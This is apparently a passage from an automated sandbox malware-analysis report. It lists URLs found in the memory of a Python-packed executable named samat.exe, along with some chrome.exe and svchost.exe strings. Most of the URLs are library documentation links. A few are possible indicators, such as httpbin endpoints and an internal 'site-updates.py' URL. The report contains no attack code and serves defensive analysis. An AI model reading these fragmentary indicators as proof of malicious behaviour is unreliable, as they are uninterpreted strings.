Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526120054.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531854842.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561049803.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/astral-sh/ruff
Source: samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: samat.exe, samat.exe, 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmp, samat.exe, 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/platformdirs/platformdirs
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packagingp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/wheel
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/wheel/issues
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de1
Source: samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11z
Source: samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/issues
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/292002
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508966927.000001BCCC48A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521773400.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549013066.000001BCCC8AA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4511944713.000001BCCC492000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538378339.000001BCCCAA1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://importlib-metadata.readthedocs.io/
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
Source: samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531201836.000001BCCD413000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532208300.000001BCCD415000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
